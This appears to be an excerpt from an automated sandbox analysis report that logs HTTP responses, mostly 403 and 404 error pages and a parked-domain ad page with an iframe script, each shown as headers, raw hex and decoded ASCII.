Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 13:49:11 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9602-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:49:17 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Oct 2021 13:50:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Oct 2021 13:50:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 13:50:44 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9602-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:50:50 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:50:55 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 69 67 68 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.high-clicks.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Oct 2021 13:52:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 13:53:16 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:53:21 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:53:21 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:53:26 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 69 67 68 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.high-clicks.com Port 80</address></body></html>
